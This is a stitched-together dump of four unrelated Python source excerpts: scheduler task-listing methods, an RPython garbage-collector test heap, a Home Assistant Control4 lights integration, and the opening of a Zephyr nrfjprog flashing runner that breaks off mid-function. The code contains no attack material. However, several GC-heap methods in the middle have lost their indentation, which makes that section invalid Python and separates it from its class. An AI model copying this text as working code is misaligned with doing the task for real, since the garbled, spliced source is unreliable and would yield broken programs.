    def _recurse_deps(self, task_id, serialized):
        # Depth-first serialization of a task and its dependency closure.
        if task_id not in serialized:
            task = self._state.get_task(task_id)
            if task is None or not task.family:
                logger.warn('Missing task for id [%s]', task_id)
                # try to infer family and params from task_id
                try:
                    family, _, param_str = task_id.rstrip(')').partition('(')
                    params = dict(param.split('=') for param in param_str.split(', '))
                except BaseException:
                    family, params = '', {}
                serialized[task_id] = {
                    'deps': [],
                    'status': UNKNOWN,
                    'workers': [],
                    'start_time': UNKNOWN,
                    'params': params,
                    'name': family,
                    'priority': 0,
                }
            else:
                serialized[task_id] = self._serialize_task(task_id)
                for dep in task.deps:
                    self._recurse_deps(dep, serialized)
    def dep_graph(self, task_id, **kwargs):
        """Serialize the dependency graph rooted at *task_id*."""
        self.prune()
        serialized = {}
        if self._state.has_task(task_id):
            self._recurse_deps(task_id, serialized)
        return serialized
    def task_list(self, status, upstream_status, limit=True, search=None, **kwargs):
        """
        Query for a subset of tasks by status.
        """
        self.prune()
        result = {}
        upstream_status_table = {}  # used to memoize upstream status
        if search is None:
            filter_func = lambda _: True
        else:
            # every whitespace-separated term must appear in the task id
            terms = search.split()
            filter_func = lambda t: all(term in t.id for term in terms)
        for task in filter(filter_func, self._state.get_active_tasks(status)):
            if (task.status != PENDING or not upstream_status or
                    upstream_status == self._upstream_status(task.id, upstream_status_table)):
                serialized = self._serialize_task(task.id, False)
                result[task.id] = serialized
        if limit and len(result) > self._config.max_shown_tasks:
            # too many to render: only report the count
            return {'num_tasks': len(result)}
        return result
    def worker_list(self, include_running=True, **kwargs):
        """List known workers, optionally with their running/pending task counts."""
        self.prune()
        workers = [
            dict(
                name=worker.id,
                last_active=worker.last_active,
                started=getattr(worker, 'started', None),
                **worker.info
            ) for worker in self._state.get_active_workers()]
        workers.sort(key=lambda worker: worker['started'], reverse=True)
        if include_running:
            running = collections.defaultdict(dict)
            num_pending = collections.defaultdict(int)
            num_uniques = collections.defaultdict(int)
            for task in self._state.get_pending_tasks():
                if task.status == RUNNING and task.worker_running:
                    running[task.worker_running][task.id] = self._serialize_task(task.id, False)
                elif task.status == PENDING:
                    for worker in task.workers:
                        num_pending[worker] += 1
                    if len(task.workers) == 1:
                        num_uniques[list(task.workers)[0]] += 1
            for worker in workers:
                tasks = running[worker['name']]
                worker['num_running'] = len(tasks)
                worker['num_pending'] = num_pending[worker['name']]
                worker['num_uniques'] = num_uniques[worker['name']]
                worker['running'] = tasks
        return workers
    def inverse_dep_graph(self, task_id, **kwargs):
        """Serialize the graph of tasks that (transitively) depend on *task_id*."""
        self.prune()
        serialized = {}
        if self._state.has_task(task_id):
            self._traverse_inverse_deps(task_id, serialized)
        return serialized
    def _traverse_inverse_deps(self, task_id, serialized):
        # Walk reverse dependencies with an explicit stack; O(stack * tasks)
        # because there is no reverse-dependency index.
        stack = [task_id]
        serialized[task_id] = self._serialize_task(task_id)
        while len(stack) > 0:
            curr_id = stack.pop()
            for task in self._state.get_active_tasks():
                if curr_id in task.deps:
                    serialized[curr_id]["deps"].append(task.id)
                    if task.id not in serialized:
                        serialized[task.id] = self._serialize_task(task.id)
                        serialized[task.id]["deps"] = []
                        stack.append(task.id)
    def task_search(self, task_str, **kwargs):
        """
        Query for a subset of tasks by task_id.
        :param task_str: substring to look for in task ids.
        :return: dict mapping status -> {task_id: serialized task}.
        """
        self.prune()
        result = collections.defaultdict(dict)
        for task in self._state.get_active_tasks():
            if task.id.find(task_str) != -1:
                serialized = self._serialize_task(task.id, False)
                result[task.status][task.id] = serialized
        return result
    def re_enable_task(self, task_id):
        """Manually clear a scheduler-disabled task; returns its serialization."""
        serialized = {}
        task = self._state.get_task(task_id)
        if task and task.status == DISABLED and task.scheduler_disable_time:
            self._state.re_enable(task, self._config)
            serialized = self._serialize_task(task_id)
        return serialized
    def fetch_error(self, task_id, **kwargs):
        """Return the stored error explanation for a task (empty if unknown)."""
        if self._state.has_task(task_id):
            return {"taskId": task_id, "error": self._state.get_task(task_id).expl}
        else:
            return {"taskId": task_id, "error": ""}
    def _update_task_history(self, task_id, status, host=None):
        # Best effort: history recording failures must never break scheduling.
        try:
            if status == DONE or status == FAILED:
                successful = (status == DONE)
                self._task_history.task_finished(task_id, successful)
            elif status == PENDING:
                self._task_history.task_scheduled(task_id)
            elif status == RUNNING:
                self._task_history.task_started(task_id, host)
        except BaseException:
            logger.warning("Error saving Task history", exc_info=True)
    @property
    def task_history(self):
        # Used by server.py to expose the calls
        return self._task_history
| |
from rpython.translator.backendopt.finalizer import FinalizerAnalyzer
from rpython.rtyper.lltypesystem import lltype, llmemory, llheap
from rpython.rtyper import llinterp, rclass
from rpython.rtyper.annlowlevel import llhelper, cast_nongc_instance_to_adr
from rpython.memory import gctypelayout
from rpython.flowspace.model import Constant
class GCManagedHeap(object):
    def __init__(self, llinterp, flowgraphs, gc_class, GC_PARAMS={}):
        """Set up an instance of *gc_class* for direct (untranslated) testing.

        NOTE(review): GC_PARAMS={} is a mutable default — harmless here since
        it is only expanded into keyword arguments, never mutated.
        """
        translator = llinterp.typer.annotator.translator
        config = translator.config.translation
        # chunk_size=10 keeps GC data structures tiny for tests;
        # translated_to_c=False selects the direct-run code paths.
        self.gc = gc_class(config,
                           chunk_size = 10,
                           translated_to_c = False,
                           **GC_PARAMS)
        self.translator = translator
        self.gc.set_root_walker(LLInterpRootWalker(self))
        self.gc.DEBUG = True
        self.llinterp = llinterp
        # Register types/constants/finalizers before starting the GC.
        self.prepare_graphs(flowgraphs)
        self.gc.setup()
        self.has_write_barrier_from_array = hasattr(self.gc,
                                                    'write_barrier_from_array')
    def prepare_graphs(self, flowgraphs):
        """Build the type-layout info and register prebuilt constants with the GC."""
        lltype2vtable = self.llinterp.typer.lltype2vtable
        layoutbuilder = DirectRunLayoutBuilder(self.gc.__class__,
                                               lltype2vtable,
                                               self.llinterp)
        self.get_type_id = layoutbuilder.get_type_id
        gcdata = layoutbuilder.initialize_gc_query_function(self.gc)
        self.gcdata = gcdata
        self.finalizer_queue_indexes = {}
        self.finalizer_handlers = []
        self.update_finalizer_handlers()
        # Tell the GC about every prebuilt constant reachable from the graphs.
        constants = collect_constants(flowgraphs)
        for obj in constants:
            TYPE = lltype.typeOf(obj)
            layoutbuilder.consider_constant(TYPE, obj, self.gc)
        self.constantroots = layoutbuilder.addresses_of_static_ptrs
        self.constantrootsnongc = layoutbuilder.addresses_of_static_ptrs_in_nongc
        self.prepare_custom_trace_funcs(gcdata)
        self._all_prebuilt_gc = layoutbuilder.all_prebuilt_gc
    def prepare_custom_trace_funcs(self, gcdata):
        """Install a dispatcher routing custom tracing callbacks by type id."""
        custom_trace_funcs = self.llinterp.typer.custom_trace_funcs
        def custom_trace(obj, typeid, callback, arg):
            # Linear search: the list of custom-traced types is expected tiny.
            for TP, func in custom_trace_funcs:
                if typeid == self.get_type_id(TP):
                    func(self.gc, obj, callback, arg)
                    return
            else:
                # dispatcher called for a type that never registered a tracer
                assert False
        for TP, func in custom_trace_funcs:
            gcdata._has_got_custom_trace(self.get_type_id(TP))
        self.gc.custom_trace_dispatcher = custom_trace
# ____________________________________________________________
#
# Interface for the llinterp
#
    def malloc(self, TYPE, n=None, flavor='gc', zero=False,
               track_allocation=True):
        """Allocate TYPE through the GC for flavor='gc'; else via lltype.malloc."""
        if flavor == 'gc':
            typeid = self.get_type_id(TYPE)
            addr = self.gc.malloc(typeid, n, zero=zero)
            result = llmemory.cast_adr_to_ptr(addr, lltype.Ptr(TYPE))
            if not self.gc.malloc_zero_filled:
                # GC did not zero the memory: clear the embedded gc pointers
                # so the new object is safe to trace.
                gctypelayout.zero_gc_pointers(result)
            return result
        else:
            return lltype.malloc(TYPE, n, flavor=flavor, zero=zero,
                                 track_allocation=track_allocation)
    def gettypeid(self, obj):
        """Return the GC type id for the pointed-to type of *obj*."""
        return self.get_type_id(lltype.typeOf(obj).TO)
    def add_memory_pressure(self, size):
        # Forward memory-pressure hints only to GCs that support them.
        if hasattr(self.gc, 'raw_malloc_memory_pressure'):
            self.gc.raw_malloc_memory_pressure(size)
    def shrink_array(self, p, smallersize):
        """Try to shrink array *p* in place; return False if the GC cannot."""
        if hasattr(self.gc, 'shrink_array'):
            addr = llmemory.cast_ptr_to_adr(p)
            return self.gc.shrink_array(addr, smallersize)
        return False
    def free(self, TYPE, flavor='gc', track_allocation=True):
        """Explicitly free a non-GC allocation (flavor must not be 'gc')."""
        assert flavor != 'gc'
        return lltype.free(TYPE, flavor=flavor,
                           track_allocation=track_allocation)
    def setfield(self, obj, fieldname, fieldvalue):
        """Store into a struct field, going through the GC write barrier."""
        STRUCT = lltype.typeOf(obj).TO
        addr = llmemory.cast_ptr_to_adr(obj)
        addr += llmemory.offsetof(STRUCT, fieldname)
        self.setinterior(obj, addr, getattr(STRUCT, fieldname), fieldvalue)
    def setarrayitem(self, array, index, newitem):
        """Store into an array item, going through the GC write barrier."""
        ARRAY = lltype.typeOf(array).TO
        addr = llmemory.cast_ptr_to_adr(array)
        addr += llmemory.itemoffsetof(ARRAY, index)
        self.setinterior(array, addr, ARRAY.OF, newitem, (index,))
    def setinterior(self, toplevelcontainer, inneraddr, INNERTYPE, newvalue,
                    offsets=()):
        """Write *newvalue* at *inneraddr*, applying the GC write barrier when
        a gc pointer is stored into a gc-managed container."""
        if (lltype.typeOf(toplevelcontainer).TO._gckind == 'gc' and
            isinstance(INNERTYPE, lltype.Ptr) and INNERTYPE.TO._gckind == 'gc'):
            #
            wb = True
            if self.has_write_barrier_from_array:
                for index in offsets:
                    if type(index) is not str:
                        # integer index into an array: use the cheaper
                        # array-specific barrier and skip the generic one
                        assert (type(index) is int    # <- fast path
                                or lltype.typeOf(index) == lltype.Signed)
                        self.gc.write_barrier_from_array(
                            llmemory.cast_ptr_to_adr(toplevelcontainer),
                            index)
                        wb = False
                        break
            #
            if wb:
                self.gc.write_barrier(
                    llmemory.cast_ptr_to_adr(toplevelcontainer))
        llheap.setinterior(toplevelcontainer, inneraddr, INNERTYPE, newvalue)
    def collect(self, *gen):
        # Trigger a collection; *gen* optionally selects the generation.
        self.gc.collect(*gen)
    def can_move(self, addr):
        """Ask the GC whether the object at *addr* may still be moved."""
        return self.gc.can_move(addr)
    def pin(self, addr):
        """Ask the GC to pin the object at *addr*; returns the GC's verdict."""
        return self.gc.pin(addr)
    def unpin(self, addr):
        """Release a previous pin on the object at *addr*."""
        self.gc.unpin(addr)
    def _is_pinned(self, addr):
        """Delegate pinned-state query to the GC."""
        return self.gc._is_pinned(addr)
    def weakref_create_getlazy(self, objgetter):
        # we have to be lazy in reading the llinterp variable containing
        # the 'obj' pointer, because the gc.malloc() call below could
        # move it around
        type_id = self.get_type_id(gctypelayout.WEAKREF)
        addr = self.gc.malloc(type_id, None, zero=False)
        result = llmemory.cast_adr_to_ptr(addr, gctypelayout.WEAKREFPTR)
        # objgetter() is only called *after* the allocation, on purpose
        result.weakptr = llmemory.cast_ptr_to_adr(objgetter())
        return llmemory.cast_ptr_to_weakrefptr(result)
    def weakref_deref(self, PTRTYPE, obj):
        """Dereference weakref *obj* and cast the result to PTRTYPE."""
        addr = gctypelayout.ll_weakref_deref(obj)
        return llmemory.cast_adr_to_ptr(addr, PTRTYPE)
    def gc_id(self, ptr):
        """Return the GC-stable id of the object *ptr* points to."""
        ptr = lltype.cast_opaque_ptr(llmemory.GCREF, ptr)
        return self.gc.id(ptr)
def writebarrier_before_copy(self, source, dest,
source_start, dest_start, length):
if self.gc.needs_write_barrier:
source_addr = llmemory.cast_ptr_to_adr(source)
dest_addr = llmemory.cast_ptr_to_adr(dest)
return self.gc.writebarrier_before_copy(source_addr, dest_addr,
source_start, dest_start,
length)
else:
return True
def gcflag_extra(self, subopnum, *args):
if subopnum == 1: # has_gcflag_extra
assert len(args) == 0
return self.gc.gcflag_extra != 0
assert len(args) == 1
addr = llmemory.cast_ptr_to_adr(args[0])
hdr = self.gc.header(addr)
if subopnum == 3: # toggle_gcflag_extra
if hdr.tid & self.gc.gcflag_extra:
hdr.tid &= ~self.gc.gcflag_extra
else:
hdr.tid |= self.gc.gcflag_extra
return (hdr.tid & self.gc.gcflag_extra) != 0
    def thread_run(self):
        # Intentionally a no-op here; nothing to do under direct
        # llinterp runs (NOTE(review): presumably a hook the translated
        # GC uses for thread support -- confirm against the transformer).
        pass
    def _get_finalizer_trigger(self, fq):
        """Return a zero-argument callable that runs fq.finalizer_trigger()
        through the llinterpreter."""
        graph = self.translator._graphof(fq.finalizer_trigger.im_func)
        def ll_trigger():
            try:
                self.llinterp.eval_graph(graph, [None], recursive=True)
            except llinterp.LLException:
                # finalizer triggers must not raise; surface it loudly
                raise RuntimeError(
                    "finalizer_trigger() raised an exception, shouldn't happen")
        return ll_trigger
def update_finalizer_handlers(self):
handlers = self.finalizer_handlers
ll_handlers = lltype.malloc(gctypelayout.FIN_HANDLER_ARRAY,
len(handlers), immortal=True)
for i in range(len(handlers)):
fq, deque = handlers[i]
ll_handlers[i].deque = cast_nongc_instance_to_adr(deque)
ll_handlers[i].trigger = llhelper(
lltype.Ptr(gctypelayout.FIN_TRIGGER_FUNC),
self._get_finalizer_trigger(fq))
self.gcdata.finalizer_handlers = llmemory.cast_ptr_to_adr(ll_handlers)
def get_finalizer_queue_index(self, fq_tag):
assert 'FinalizerQueue TAG' in fq_tag.expr
fq = fq_tag.default
try:
index = self.finalizer_queue_indexes[fq]
except KeyError:
index = len(self.finalizer_handlers)
self.finalizer_queue_indexes[fq] = index
deque = self.gc.AddressDeque()
self.finalizer_handlers.append((fq, deque))
self.update_finalizer_handlers()
return index
def gc_fq_next_dead(self, fq_tag):
index = self.get_finalizer_queue_index(fq_tag)
deque = self.finalizer_handlers[index][1]
if deque.non_empty():
obj = deque.popleft()
else:
obj = llmemory.NULL
return llmemory.cast_adr_to_ptr(obj, rclass.OBJECTPTR)
def gc_fq_register(self, fq_tag, ptr):
index = self.get_finalizer_queue_index(fq_tag)
ptr = lltype.cast_opaque_ptr(llmemory.GCREF, ptr)
self.gc.register_finalizer(index, ptr)
# ____________________________________________________________
class LLInterpRootWalker:
    """Enumerates GC roots (prebuilt constants and llinterp stack) for the
    directly-run GC."""
    _alloc_flavor_ = 'raw'

    def __init__(self, gcheap):
        self.gcheap = gcheap

    def walk_roots(self, collect_stack_root,
                   collect_static_in_prebuilt_nongc,
                   collect_static_in_prebuilt_gc,
                   is_minor=False):
        """Invoke each non-None callback as callback(gc, addrofaddr) for
        every root address that points to a valid gc object."""
        gcheap = self.gcheap
        gc = gcheap.gc
        static_sources = [
            (collect_static_in_prebuilt_gc, gcheap.constantroots),
            (collect_static_in_prebuilt_nongc, gcheap.constantrootsnongc),
        ]
        for callback, addresses in static_sources:
            if callback:
                for addrofaddr in addresses:
                    if gc.points_to_valid_gc_object(addrofaddr):
                        callback(gc, addrofaddr)
        if collect_stack_root:
            for addrofaddr in gcheap.llinterp.find_roots(is_minor):
                if gc.points_to_valid_gc_object(addrofaddr):
                    collect_stack_root(gc, addrofaddr)

    def _walk_prebuilt_gc(self, collect): # debugging only!  not RPython
        for obj in self.gcheap._all_prebuilt_gc:
            collect(llmemory.cast_ptr_to_adr(obj._as_ptr()))

    def finished_minor_collection(self):
        # Nothing to do after a minor collection in this walker.
        pass
class DirectRunLayoutBuilder(gctypelayout.TypeLayoutBuilder):
    """Type layout builder that evaluates destructors and custom tracers
    through the llinterpreter instead of translated code."""

    def __init__(self, GCClass, lltype2vtable, llinterp):
        self.llinterp = llinterp
        super(DirectRunLayoutBuilder, self).__init__(GCClass, lltype2vtable)

    def make_destructor_funcptr_for_type(self, TYPE):
        """Return (funcptr, is_light) for TYPE's destructor, or
        (None, False) when TYPE's rtti carries no destructor."""
        from rpython.memory.gctransform.support import get_rtti
        rtti = get_rtti(TYPE)
        if rtti is not None and hasattr(rtti._obj, 'destructor_funcptr'):
            destrptr = rtti._obj.destructor_funcptr
            DESTR_ARG = lltype.typeOf(destrptr).TO.ARGS[0]
            destrgraph = destrptr._obj.graph
        else:
            return None, False

        t = self.llinterp.typer.annotator.translator
        # "light" unless the analyzer finds something disqualifying.
        is_light = not FinalizerAnalyzer(t).analyze_light_finalizer(destrgraph)
        def ll_destructor(addr):
            try:
                v = llmemory.cast_adr_to_ptr(addr, DESTR_ARG)
                self.llinterp.eval_graph(destrgraph, [v], recursive=True)
            except llinterp.LLException:
                # destructors must not raise; surface it loudly
                raise RuntimeError(
                    "a destructor raised an exception, shouldn't happen")
        return (llhelper(gctypelayout.GCData.CUSTOM_FUNC_PTR, ll_destructor),
                is_light)

    def make_custom_trace_funcptr_for_type(self, TYPE):
        """Return TYPE's custom trace function pointer, or None if the
        rtti has none attached."""
        from rpython.memory.gctransform.support import get_rtti
        rtti = get_rtti(TYPE)
        if rtti is not None and hasattr(rtti._obj, 'custom_trace_funcptr'):
            return rtti._obj.custom_trace_funcptr
        else:
            return None
def collect_constants(graphs):
    """Return a dict whose keys are all prebuilt low-level objects
    referenced as Constants anywhere in *graphs*."""
    constants = {}
    def visit(args):
        # Record every non-Void Constant argument.
        for arg in args:
            if isinstance(arg, Constant) and arg.concretetype is not lltype.Void:
                reccollect(constants, arg.value)
    for graph in graphs:
        for block in graph.iterblocks():
            visit(block.inputargs)
            for op in block.operations:
                visit(op.args)
        for link in graph.iterlinks():
            visit(link.args)
            if hasattr(link, "llexitcase"):
                reccollect(constants, link.llexitcase)
    return constants
def reccollect(constants, llvalue):
    """Recursively add to *constants* every prebuilt low-level object
    reachable from the pointer *llvalue*, including parent containers."""
    if (isinstance(llvalue, lltype._abstract_ptr)
        and llvalue._obj is not None and llvalue._obj not in constants
        and not isinstance(llvalue._obj, int)):
        TYPE = llvalue._T
        # Mark before recursing to cut cycles in the object graph.
        constants[llvalue._obj] = True
        if isinstance(TYPE, lltype.Struct):
            for name in TYPE._names:
                reccollect(constants, getattr(llvalue, name))
        elif isinstance(TYPE, lltype.Array):
            for llitem in llvalue:
                reccollect(constants, llitem)
        # An interior object keeps its parent container alive too.
        parent, parentindex = lltype.parentlink(llvalue._obj)
        if parent is not None:
            reccollect(constants, parent._as_ptr())
def prepare_graphs_and_create_gc(llinterp, GCClass, GC_PARAMS=None):
    """Attach a GCManagedHeap built from GCClass to *llinterp*.

    GC_PARAMS previously defaulted to a shared mutable dict ({}), the
    classic mutable-default pitfall; a None sentinel gives each call its
    own fresh dict while keeping the same behavior for all callers.
    """
    if GC_PARAMS is None:
        GC_PARAMS = {}
    flowgraphs = llinterp.typer.annotator.translator.graphs[:]
    llinterp.heap = GCManagedHeap(llinterp, flowgraphs, GCClass, GC_PARAMS)
| |
"""Platform for Control4 Lights."""
from __future__ import annotations
import asyncio
from datetime import timedelta
import logging
from pyControl4.error_handling import C4Exception
from pyControl4.light import C4Light
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_TRANSITION,
SUPPORT_BRIGHTNESS,
SUPPORT_TRANSITION,
LightEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_SCAN_INTERVAL
from homeassistant.core import HomeAssistant
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from . import Control4Entity, get_items_of_category
from .const import CONF_DIRECTOR, CONTROL4_ENTITY_TYPE, DOMAIN
from .director_utils import director_update_data
_LOGGER = logging.getLogger(__name__)

# Director item category queried for light entities.
CONTROL4_CATEGORY = "lights"
# Director variable polled for on/off (non-dimmer) lights.
CONTROL4_NON_DIMMER_VAR = "LIGHT_STATE"
# Director variable polled for dimmer lights (scaled by 2.55 to 0-255
# in Control4Light.brightness, i.e. assumed to be a 0-100 level).
CONTROL4_DIMMER_VAR = "LIGHT_LEVEL"
async def async_setup_entry(
    hass: HomeAssistant, entry: ConfigEntry, async_add_entities
):
    """Set up Control4 lights from a config entry.

    Creates two polling coordinators (dimmers and non-dimmers report state
    through different director variables) and one Control4Light entity per
    director item of the entity type.
    """
    entry_data = hass.data[DOMAIN][entry.entry_id]
    scan_interval = entry_data[CONF_SCAN_INTERVAL]
    _LOGGER.debug(
        "Scan interval = %s",
        scan_interval,
    )

    async def async_update_data_non_dimmer():
        """Fetch data from Control4 director for non-dimmer lights."""
        try:
            return await director_update_data(hass, entry, CONTROL4_NON_DIMMER_VAR)
        except C4Exception as err:
            raise UpdateFailed(f"Error communicating with API: {err}") from err

    async def async_update_data_dimmer():
        """Fetch data from Control4 director for dimmer lights."""
        try:
            return await director_update_data(hass, entry, CONTROL4_DIMMER_VAR)
        except C4Exception as err:
            raise UpdateFailed(f"Error communicating with API: {err}") from err

    non_dimmer_coordinator = DataUpdateCoordinator(
        hass,
        _LOGGER,
        name="light",
        update_method=async_update_data_non_dimmer,
        update_interval=timedelta(seconds=scan_interval),
    )
    dimmer_coordinator = DataUpdateCoordinator(
        hass,
        _LOGGER,
        name="light",
        update_method=async_update_data_dimmer,
        update_interval=timedelta(seconds=scan_interval),
    )

    # Fetch initial data so we have data when entities subscribe
    await non_dimmer_coordinator.async_refresh()
    await dimmer_coordinator.async_refresh()

    items_of_category = await get_items_of_category(hass, entry, CONTROL4_CATEGORY)

    entity_list = []
    for item in items_of_category:
        try:
            # BUGFIX: non-entity items (e.g. parent devices) must be skipped
            # here.  Previously they fell through to the coordinator lookup
            # below, reusing item_id/item_name from the previous iteration
            # (or raising NameError on the very first item).
            if item["type"] != CONTROL4_ENTITY_TYPE:
                continue
            item_name = item["name"]
            item_id = item["id"]
            item_parent_id = item["parentId"]

            item_manufacturer = None
            item_device_name = None
            item_model = None

            # Pull device metadata from the item's parent, if present.
            for parent_item in items_of_category:
                if parent_item["id"] == item_parent_id:
                    item_manufacturer = parent_item["manufacturer"]
                    item_device_name = parent_item["name"]
                    item_model = parent_item["model"]
        except KeyError:
            _LOGGER.exception(
                "Unknown device properties received from Control4: %s",
                item,
            )
            continue

        # Presence in one coordinator's data decides whether the item is a
        # dimmer; items in neither cannot be set up.
        if item_id in dimmer_coordinator.data:
            item_is_dimmer = True
            item_coordinator = dimmer_coordinator
        elif item_id in non_dimmer_coordinator.data:
            item_is_dimmer = False
            item_coordinator = non_dimmer_coordinator
        else:
            director = entry_data[CONF_DIRECTOR]
            item_variables = await director.getItemVariables(item_id)
            _LOGGER.warning(
                "Couldn't get light state data for %s, skipping setup. Available variables from Control4: %s",
                item_name,
                item_variables,
            )
            continue

        entity_list.append(
            Control4Light(
                entry_data,
                item_coordinator,
                item_name,
                item_id,
                item_device_name,
                item_manufacturer,
                item_model,
                item_parent_id,
                item_is_dimmer,
            )
        )

    async_add_entities(entity_list, True)
class Control4Light(Control4Entity, LightEntity):
    """Control4 light entity."""

    def __init__(
        self,
        entry_data: dict,
        coordinator: DataUpdateCoordinator,
        name: str,
        idx: int,
        device_name: str | None,
        device_manufacturer: str | None,
        device_model: str | None,
        device_id: int,
        is_dimmer: bool,
    ) -> None:
        """Initialize Control4 light entity."""
        super().__init__(
            entry_data,
            coordinator,
            name,
            idx,
            device_name,
            device_manufacturer,
            device_model,
            device_id,
        )
        # Dimmers get brightness/transition support; non-dimmers are on/off.
        self._is_dimmer = is_dimmer

    def create_api_object(self):
        """Create a pyControl4 device object.

        This exists so the director token used is always the latest one,
        without needing to re-init the entire entity.
        """
        return C4Light(self.entry_data[CONF_DIRECTOR], self._idx)

    @property
    def is_on(self):
        """Return whether this light is on or off."""
        current_level = self.coordinator.data[self._idx]["value"]
        return current_level > 0

    @property
    def brightness(self):
        """Return the brightness of this light between 0..255."""
        if not self._is_dimmer:
            return None
        # Director level scaled by 2.55 (assumes a 0-100 level variable).
        return round(self.coordinator.data[self._idx]["value"] * 2.55)

    @property
    def supported_features(self) -> int:
        """Flag supported features."""
        if not self._is_dimmer:
            return 0
        return SUPPORT_BRIGHTNESS | SUPPORT_TRANSITION

    async def async_turn_on(self, **kwargs) -> None:
        """Turn the entity on."""
        c4_light = self.create_api_object()
        if self._is_dimmer:
            # ATTR_TRANSITION is seconds; the director wants milliseconds.
            transition_length = kwargs.get(ATTR_TRANSITION, 0) * 1000
            if ATTR_BRIGHTNESS in kwargs:
                brightness = (kwargs[ATTR_BRIGHTNESS] / 255) * 100
            else:
                brightness = 100
            await c4_light.rampToLevel(brightness, transition_length)
        else:
            transition_length = 0
            await c4_light.setLevel(100)
        # Wait a bit past the ramp before polling the new state.
        if transition_length == 0:
            transition_length = 1000
        delay_time = (transition_length / 1000) + 0.7
        _LOGGER.debug("Delaying light update by %s seconds", delay_time)
        await asyncio.sleep(delay_time)
        await self.coordinator.async_request_refresh()

    async def async_turn_off(self, **kwargs) -> None:
        """Turn the entity off."""
        c4_light = self.create_api_object()
        if self._is_dimmer:
            transition_length = kwargs.get(ATTR_TRANSITION, 0) * 1000
            await c4_light.rampToLevel(0, transition_length)
        else:
            transition_length = 0
            await c4_light.setLevel(0)
        # Wait a bit past the ramp before polling the new state.
        if transition_length == 0:
            transition_length = 1500
        delay_time = (transition_length / 1000) + 0.7
        _LOGGER.debug("Delaying light update by %s seconds", delay_time)
        await asyncio.sleep(delay_time)
        await self.coordinator.async_request_refresh()
| |
# Copyright (c) 2017 Linaro Limited.
# Copyright (c) 2019 Nordic Semiconductor ASA.
#
# SPDX-License-Identifier: Apache-2.0
'''Runner for flashing with nrfjprog.'''
from functools import partial
import os
from pathlib import Path
import shlex
import subprocess
import sys
from re import fullmatch, escape
from runners.core import ZephyrBinaryRunner, RunnerCaps, depr_action
try:
from intelhex import IntelHex
except ImportError:
IntelHex = None
# Helper function for inspecting hex files.
# has_region returns True if hex file has any contents in a specific region
# region_filter is a callable that takes an address as argument and
# returns True if that address is in the region in question
def has_region(regions, hex_file):
    """Return True if *hex_file* has any contents inside any of *regions*.

    *regions* is an iterable of (start, end) address pairs.  A missing
    hex file simply yields False.
    """
    if IntelHex is None:
        raise RuntimeError('one or more Python dependencies were missing; '
                           "see the getting started guide for details on "
                           "how to fix")
    try:
        contents = IntelHex(hex_file)
    except FileNotFoundError:
        return False
    return any(len(contents[start:end]) > 0 for (start, end) in regions)
# https://infocenter.nordicsemi.com/index.jsp?topic=%2Fug_nrf_cltools%2FUG%2Fcltools%2Fnrf_nrfjprogexe_return_codes.html&cp=9_1_3_1
# nrfjprog exit code meaning the operation is blocked by the chip's
# (readback) protection; used below to suggest "west flash --recover".
UnavailableOperationBecauseProtectionError = 16
class NrfJprogBinaryRunner(ZephyrBinaryRunner):
    '''Runner front-end for nrfjprog.'''

    def __init__(self, cfg, family, softreset, dev_id, erase=False,
                 tool_opt=None, force=False, recover=False):
        '''Initialize the runner.

        tool_opt is a list of extra option strings passed through to
        nrfjprog.  BUGFIX: it previously defaulted to a shared mutable
        list ([]); a None sentinel is equivalent and avoids the
        mutable-default pitfall.
        '''
        super().__init__(cfg)
        self.hex_ = cfg.hex_file
        self.family = family
        self.softreset = softreset
        self.dev_id = dev_id
        self.erase = bool(erase)
        self.force = force
        self.recover = bool(recover)

        # Split each tool_opt string shell-style and flatten the result.
        self.tool_opt = []
        for opts in [shlex.split(opt) for opt in (tool_opt or [])]:
            self.tool_opt += opts

    @classmethod
    def name(cls):
        return 'nrfjprog'

    @classmethod
    def capabilities(cls):
        return RunnerCaps(commands={'flash'}, dev_id=True, erase=True)

    @classmethod
    def dev_id_help(cls) -> str:
        return '''Device identifier. Use it to select the J-Link Serial Number
            of the device connected over USB. '*' matches one or more
            characters/digits'''

    @classmethod
    def do_add_parser(cls, parser):
        '''Register nrfjprog-specific command line arguments.'''
        parser.add_argument('--nrf-family',
                            choices=['NRF51', 'NRF52', 'NRF53', 'NRF91'],
                            help='''MCU family; still accepted for
                            compatibility only''')
        parser.add_argument('--softreset', required=False,
                            action='store_true',
                            help='use reset instead of pinreset')
        parser.add_argument('--snr', required=False, dest='dev_id',
                            action=partial(depr_action,
                                           replacement='-i/--dev-id'),
                            help='Deprecated: use -i/--dev-id instead')
        parser.add_argument('--tool-opt', default=[], action='append',
                            help='''Additional options for nrfjprog,
                            e.g. "--recover"''')
        parser.add_argument('--force', required=False,
                            action='store_true',
                            help='Flash even if the result cannot be guaranteed.')
        parser.add_argument('--recover', required=False,
                            action='store_true',
                            help='''erase all user available non-volatile
                            memory and disable read back protection before
                            flashing (erases flash for both cores on nRF53)''')

    @classmethod
    def do_create(cls, cfg, args):
        '''Build a runner instance from parsed arguments.'''
        return NrfJprogBinaryRunner(cfg, args.nrf_family, args.softreset,
                                    args.dev_id, erase=args.erase,
                                    tool_opt=args.tool_opt, force=args.force,
                                    recover=args.recover)

    def ensure_snr(self):
        '''Make sure self.dev_id holds one concrete serial number.'''
        if not self.dev_id or "*" in self.dev_id:
            self.dev_id = self.get_board_snr(self.dev_id or "*")
        self.dev_id = self.dev_id.lstrip("0")

    def get_boards(self):
        '''Return the serial numbers of all connected boards.'''
        snrs = self.check_output(['nrfjprog', '--ids'])
        snrs = snrs.decode(sys.getdefaultencoding()).strip().splitlines()
        if not snrs:
            raise RuntimeError('"nrfjprog --ids" did not find a board; '
                               'is the board connected?')
        return snrs

    @staticmethod
    def verify_snr(snr):
        '''Reject the bogus '0' serial number nrfjprog reports when a
        debugger is already attached.'''
        if snr == '0':
            raise RuntimeError('"nrfjprog --ids" returned 0; '
                               'is a debugger already connected?')

    def get_board_snr(self, glob):
        # Use nrfjprog --ids to discover connected boards.
        #
        # If there's exactly one board connected, it's safe to assume
        # the user wants that one. Otherwise, bail unless there are
        # multiple boards and we are connected to a terminal, in which
        # case use print() and input() to ask what the user wants.

        re_glob = escape(glob).replace(r"\*", ".+")
        snrs = [snr for snr in self.get_boards() if fullmatch(re_glob, snr)]

        if len(snrs) == 0:
            raise RuntimeError(
                'There are no boards connected{}.'.format(
                        f" matching '{glob}'" if glob != "*" else ""))
        elif len(snrs) == 1:
            board_snr = snrs[0]
